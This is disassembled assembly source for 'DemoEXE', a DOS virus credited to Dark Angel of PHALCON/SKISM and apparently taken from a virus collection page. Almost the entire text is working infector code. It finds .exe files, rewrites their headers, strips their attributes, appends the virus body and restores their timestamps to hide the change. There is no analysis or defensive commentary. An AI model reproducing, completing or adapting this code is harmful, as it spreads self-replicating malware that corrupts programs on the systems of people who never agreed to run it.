OneHalf  Virii

DEMOEXE

; --------------------------------------------------------------------------
; Disassembled by FairWind / NRG , [email protected]
; --------------------------------------------------------------------------

id = 'DA'

startvirus:
call next
next: pop bp
sub bp,offset next

push ds
push es
push cs
pop ds
push cs
pop es
lea si,[bp+jmpsave2]
lea di,[bp+jmpsave]
movsw
movsw
movsw
movsw

mov ah,1Ah
lea dx,[bp+newDTA]
int 21h

lea dx,[bp+exe_mask]
mov ah,4eh
mov cx,7
findfirstnext:
int 21h
jc done_infections

mov al,0h
call open

mov ah,3fh
lea dx,[bp+buffer]
mov cx,1Ah
int 21h

mov ah,3eh
int 21h

checkEXE: cmp word ptr [bp+buffer+10h],id
jnz infect_exe
find_next:
mov ah,4fh
jmp short findfirstnext
done_infections:
mov ah,1ah
mov dx,80h
pop es
pop ds
int 21h
mov ax,es
add ax,10h
add word ptr cs:[si+jmpsave+2],ax
add ax,word ptr cs:[si+stacksave+2]
cli
mov sp,word ptr cs:[si+stacksave]
mov ss,ax
sti
db 0eah
jmpsave dd ?
stacksave dd ?
jmpsave2 dd 0fff00000h
stacksave2 dd ?

creator db '[MPC]',0,'Dark Angel of PHALCON/SKISM',0
virusname db '[DemoEXE] for 40Hex',0

infect_exe:
les ax, dword ptr [bp+buffer+14h]
mov word ptr [bp+jmpsave2], ax
mov word ptr [bp+jmpsave2+2], es

les ax, dword ptr [bp+buffer+0Eh]
mov word ptr [bp+stacksave2], es
mov word ptr [bp+stacksave2+2], ax

mov ax, word ptr [bp+buffer + 8]
mov cl, 4
shl ax, cl
xchg ax, bx

les ax, [bp+offset newDTA+26]
mov dx, es
push ax
push dx

sub ax, bx
sbb dx, 0

mov cx, 10h
div cx

mov word ptr [bp+buffer+14h], dx
mov word ptr [bp+buffer+16h], ax

mov word ptr [bp+buffer+0Eh], ax
mov word ptr [bp+buffer+10h], id

pop dx
pop ax

add ax, heap-startvirus
adc dx, 0

mov cl, 9
push ax
shr ax, cl
ror dx, cl
stc
adc dx, ax
pop ax
and ah, 1

mov word ptr [bp+buffer+4], dx
mov word ptr [bp+buffer+2], ax

push cs
pop es

mov cx, 1ah
finishinfection:
push cx
xor cx,cx
call attributes
mov al,2
call open

mov ah,40h
lea dx,[bp+buffer]
pop cx
int 21h

mov ax,4202h
xor cx,cx
cwd
int 21h

mov ah,40h
lea dx,[bp+startvirus]
mov cx,heap-startvirus
int 21h

mov ax,5701h
mov cx,word ptr [bp+newDTA+16h]
mov dx,word ptr [bp+newDTA+18h]
int 21h

mov ah,3eh
int 21h

mov ch,0
mov cl,byte ptr [bp+newDTA+15h]
call attributes

mo_infections: jmp find_next

open:
mov ah,3dh
lea dx,[bp+newDTA+30]
int 21h
xchg ax,bx
ret

attributes:
mov ax,4301h
lea dx,[bp+newDTA+30]
int 21h
ret

exe_mask db '*.exe',0
heap:
newDTA db 42 dup (?)
buffer db 1ah dup (?)
endheap:

end startvirus